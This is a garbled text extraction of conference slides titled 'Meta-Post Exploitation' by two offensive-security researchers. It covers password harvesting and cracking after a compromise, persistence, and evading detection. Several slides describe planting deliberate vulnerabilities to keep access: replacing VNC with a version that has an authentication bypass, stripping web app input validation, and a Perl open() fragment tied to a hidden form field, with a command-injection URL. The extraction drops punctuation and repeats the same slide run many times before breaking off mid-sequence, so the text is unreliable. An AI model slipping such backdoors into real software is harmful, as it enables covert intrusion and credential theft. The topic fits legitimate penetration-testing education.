Slide 1

Meta-Post Exploitation

Val Smith (Valsmithoffensivecomputingnet)Colin Ames (amescoffensivecomputingnet)

Using Old Lost Forgotten Knowledge

Slide 2

Valsmithndash Affiliations

bull Offensive Computingbull Metasploitbull cDc

ndash Workbull Malware Analystbull Reverse Engineerbull Penetration Testerbull Exploit developer

Slide 3

Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 3

Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

